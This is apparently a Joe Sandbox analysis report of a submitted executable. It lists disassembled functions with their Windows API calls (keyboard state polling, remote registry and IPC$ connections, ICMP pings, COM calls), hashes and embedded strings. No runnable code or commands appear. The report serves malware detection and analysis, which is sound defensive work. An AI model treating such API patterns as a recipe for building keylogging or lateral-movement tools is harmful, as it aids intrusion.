                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ColorLongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 259745315-0
                                                                                                            • Opcode ID: 99ee7169f8d9739187d22187dfaa4e1399f9121a58c0e3bf52d22db73cdf4d11
                                                                                                            • Instruction ID: dffacb8fba69a6dcc00b1d8790acefcefc91a95a2c6ea9d03fd79af8e9f5bfe9
                                                                                                            • Opcode Fuzzy Hash: 99ee7169f8d9739187d22187dfaa4e1399f9121a58c0e3bf52d22db73cdf4d11
                                                                                                            • Instruction Fuzzy Hash: 37417F31504740AFDB205F389C94BBA7BA9EB46361F18565AF9A28B2E1D731DC42DB30
                                                                                                            Function 00DB96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00D9F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00DB9717
                                                                                                            • LoadStringW.USER32(00000000,?,00D9F7F8,00000001), ref: 00DB9720
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D9F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00DB9742
                                                                                                            • LoadStringW.USER32(00000000,?,00D9F7F8,00000001), ref: 00DB9745
                                                                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00DB9866
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                            • API String ID: 747408836-2268648507
                                                                                                            • Opcode ID: c82f4a1a33b3e22c6323e820f797a868ecf401f29342b57dd8017f41558302bd
                                                                                                            • Instruction ID: fc5e47d36d7af93925a6e88c6d834e2518c1a7889e551fc8f8b7d0ac334b1659
                                                                                                            • Opcode Fuzzy Hash: c82f4a1a33b3e22c6323e820f797a868ecf401f29342b57dd8017f41558302bd
                                                                                                            • Instruction Fuzzy Hash: 78414A72800219AADF04FBE4DD96DEEB779EF14341F500065FA0672092EA356F49CB71
                                                                                                            Function 00DB06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DB07A2
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DB07BE
                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DB07DA
                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DB0804
                                                                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00DB082C
                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DB0837
                                                                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DB083C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                            • API String ID: 323675364-22481851
                                                                                                            • Opcode ID: 03184c69714a4f82df8ad2266185c221d1b8c968156b349c71a5330a32220c11
                                                                                                            • Instruction ID: 27991b7b3393f5a39a4b0a38b309a760f47d9e10214e99c8dff7d160be01a18a
                                                                                                            • Opcode Fuzzy Hash: 03184c69714a4f82df8ad2266185c221d1b8c968156b349c71a5330a32220c11
                                                                                                            • Instruction Fuzzy Hash: E141F572810229EBDF15EBA4DC95CEEB778FF44351B444129E912A7261EB309E48CBB0
                                                                                                            Function 00DD3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DD3C5C
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DD3C8A
                                                                                                            • CoUninitialize.OLE32 ref: 00DD3C94
                                                                                                            • _wcslen.LIBCMT ref: 00DD3D2D
                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00DD3DB1
                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DD3ED5
                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DD3F0E
                                                                                                            • CoGetObject.OLE32(?,00000000,00DEFB98,?), ref: 00DD3F2D
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00DD3F40
                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DD3FC4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DD3FD8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 429561992-0
                                                                                                            • Opcode ID: 2a0b4e7e572efa761bdfd9cbe01fcfec8f5987564a9bb836e73e60cefea05188
                                                                                                            • Instruction ID: 51c3d0098cfa8ca5b963a9cf4ddcc1196c32d4a257e794e9d2900ab0dc9c24e8
                                                                                                            • Opcode Fuzzy Hash: 2a0b4e7e572efa761bdfd9cbe01fcfec8f5987564a9bb836e73e60cefea05188
                                                                                                            • Instruction Fuzzy Hash: 91C112716083459F9700DF68C88492BBBE9EF89744F14491EF98A9B351D731EE06CB62
                                                                                                            Function 00DC7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32(00000000), ref: 00DC7AF3
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DC7B8F
                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00DC7BA3
                                                                                                            • CoCreateInstance.OLE32(00DEFD08,00000000,00000001,00E16E6C,?), ref: 00DC7BEF
                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DC7C74
                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 00DC7CCC
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00DC7D57
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DC7D7A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00DC7D81
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00DC7DD6
                                                                                                            • CoUninitialize.OLE32 ref: 00DC7DDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 2762341140-0
                                                                                                            • Opcode ID: fa9c61f58ac1d31b2f6413cc870be61dba298c0bb00e4bab9ea98d07cfba29b4
                                                                                                            • Instruction ID: 64a7665e686ae437f8090d4483ef2ee352d833edf7b08cad3f9d9c36f12e3d78
                                                                                                            • Opcode Fuzzy Hash: fa9c61f58ac1d31b2f6413cc870be61dba298c0bb00e4bab9ea98d07cfba29b4
                                                                                                            • Instruction Fuzzy Hash: DEC1EA75A04205AFCB14DFA4C884DAEBBB9FF48314B148599E81ADB361D730ED45CFA0
                                                                                                            Function 00DE541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DE5504
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE5515
                                                                                                            • CharNextW.USER32(00000158), ref: 00DE5544
                                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DE5585
                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DE559B
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE55AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CharNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1350042424-0
                                                                                                            • Opcode ID: 495985592a970e08d3816bf6605b0e5292659847a1344ce1398b42e92e59596f
                                                                                                            • Instruction ID: b557f505af55cbb36a465b4cf468d28d911890626166afa90f9825503aa945dc
                                                                                                            • Opcode Fuzzy Hash: 495985592a970e08d3816bf6605b0e5292659847a1344ce1398b42e92e59596f
                                                                                                            • Instruction Fuzzy Hash: 9861C130900689EFDF10AF52EC84AFE3B79EB053A8F144149F965AB295D7708A81DB70
                                                                                                            Function 00DAFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DAFAAF
                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00DAFB08
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DAFB1A
                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DAFB3A
                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00DAFB8D
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DAFBA1
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DAFBB6
                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00DAFBC3
                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAFBCC
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DAFBDE
                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DAFBE9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2706829360-0
                                                                                                            • Opcode ID: 947918e70d4cd8dd972150b5b4872775a647e374adbc665fa7761513d5084188
                                                                                                            • Instruction ID: e435b8ce2cfa16ddabe2f86c3278d98e0433d06f9395e1629d4d4c4d2391a8c3
                                                                                                            • Opcode Fuzzy Hash: 947918e70d4cd8dd972150b5b4872775a647e374adbc665fa7761513d5084188
                                                                                                            • Instruction Fuzzy Hash: 1A412035A102199FCB10EFA4D8949ADBBB9FF49354F008069F955EB361D730E946CBB0
                                                                                                            Function 00DB9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetKeyboardState.USER32(?), ref: 00DB9CA1
                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00DB9D22
                                                                                                            • GetKeyState.USER32(000000A0), ref: 00DB9D3D
                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00DB9D57
                                                                                                            • GetKeyState.USER32(000000A1), ref: 00DB9D6C
                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00DB9D84
                                                                                                            • GetKeyState.USER32(00000011), ref: 00DB9D96
                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00DB9DAE
                                                                                                            • GetKeyState.USER32(00000012), ref: 00DB9DC0
                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00DB9DD8
                                                                                                            • GetKeyState.USER32(0000005B), ref: 00DB9DEA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: State$Async$Keyboard
                                                                                                            • String ID:
                                                                                                            • API String ID: 541375521-0
                                                                                                            • Opcode ID: 7cfba96a9d9ceb232d2550866486ade895a2a51ba85dd7fd8f65ae43f260b154
                                                                                                            • Instruction ID: e16b1a2ced8939e986cb4f1a33e21115f9c0823f1f34c442b38dc25380b9224c
                                                                                                            • Opcode Fuzzy Hash: 7cfba96a9d9ceb232d2550866486ade895a2a51ba85dd7fd8f65ae43f260b154
                                                                                                            • Instruction Fuzzy Hash: A441B6345047C9A9FF31966188643F5FEA06F12344F4C805EDBC75A6C2DBA5A9C8CBB2
                                                                                                            Function 00DD055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00DD05BC
                                                                                                            • inet_addr.WSOCK32(?), ref: 00DD061C
                                                                                                            • gethostbyname.WSOCK32(?), ref: 00DD0628
                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 00DD0636
                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DD06C6
                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DD06E5
                                                                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00DD07B9
                                                                                                            • WSACleanup.WSOCK32 ref: 00DD07BF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                            • String ID: Ping
                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                            • Opcode ID: 1ed0548bbd4dd697afb0cf05717363f00358ee6cc300308584311e2fba99bf29
                                                                                                            • Instruction ID: 2c562ad78f7f1f8af92840c1ada53c1bd68b872e7fcfff960e6c7f6f08f9c38b
                                                                                                            • Opcode Fuzzy Hash: 1ed0548bbd4dd697afb0cf05717363f00358ee6cc300308584311e2fba99bf29
                                                                                                            • Instruction Fuzzy Hash: F7915D35604341AFD720DF15D488B1ABBE4EF84318F1885AAE8699F7A2C730ED45CFA1
                                                                                                            Function 00DD8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharLower
                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                            • API String ID: 707087890-567219261
                                                                                                            • Opcode ID: edeab89c09f8e03338298d85228cdc3ad13e14e58f3e24aef50e9e0c9bdec863
                                                                                                            • Instruction ID: 700276ba63f96f2bb62f827b983462dcaae5a1ab112eb34fa0efa5ae9f687b1a
                                                                                                            • Opcode Fuzzy Hash: edeab89c09f8e03338298d85228cdc3ad13e14e58f3e24aef50e9e0c9bdec863
                                                                                                            • Instruction Fuzzy Hash: 2751AF31A001169BCF25DF68C8519BEB7A6EF64720B24422AF866E73C4DB31DD40DBB0
                                                                                                            Function 00DD372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32 ref: 00DD3774
                                                                                                            • CoUninitialize.OLE32 ref: 00DD377F
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00DEFB78,?), ref: 00DD37D9
                                                                                                            • IIDFromString.OLE32(?,?), ref: 00DD384C
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DD38E4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DD3936
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                            • API String ID: 636576611-1287834457
                                                                                                            • Opcode ID: 86a020c5c47e227594af2f80662531410a06d5e32bc89b8865e7ef89fd9ed212
                                                                                                            • Instruction ID: da6c6daf63d365ef617f1b21e731df9256ceb089c6a35743fa2ac8ee931d05b7
                                                                                                            • Opcode Fuzzy Hash: 86a020c5c47e227594af2f80662531410a06d5e32bc89b8865e7ef89fd9ed212
                                                                                                            • Instruction Fuzzy Hash: 36618AB1608701AFD310DF54D889B6ABBE8EF48710F14090AF9859B391D770EE49DBB2
                                                                                                            Function 00DC3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DC33CF
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DC33F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-3080491070
                                                                                                            • Opcode ID: 13eaf10f8a6da7c7c3f310e23c1704c5e068279857397d888459d27ec9c53ad9
                                                                                                            • Instruction ID: f9de180f670e6e92fb50a47cc506d67078b7639981174e7a61ca03272ea02ef3
                                                                                                            • Opcode Fuzzy Hash: 13eaf10f8a6da7c7c3f310e23c1704c5e068279857397d888459d27ec9c53ad9
                                                                                                            • Instruction Fuzzy Hash: D051797290020AAADF15EBA0CD52EEEB779EF14341F244165F905730A2EB316F99CB70
                                                                                                            Function 00DBB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                            • API String ID: 1256254125-769500911
                                                                                                            • Opcode ID: 6ad15218f09500dca10aa99b01fff82265be3f77eac72aa4a00faaf782a882a1
                                                                                                            • Instruction ID: 99cc6154f2e853f21b9efd8b6e97aa20e636e63ae656d6fa73455d42f912e074
                                                                                                            • Opcode Fuzzy Hash: 6ad15218f09500dca10aa99b01fff82265be3f77eac72aa4a00faaf782a882a1
                                                                                                            • Instruction Fuzzy Hash: 8441B632A00126DBCB205F7D88915FE7BA5ABA0774B28412BE466DF284E771CD81C7B0
                                                                                                            Function 00DC5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00DC53A0
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DC5416
                                                                                                            • GetLastError.KERNEL32 ref: 00DC5420
                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00DC54A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
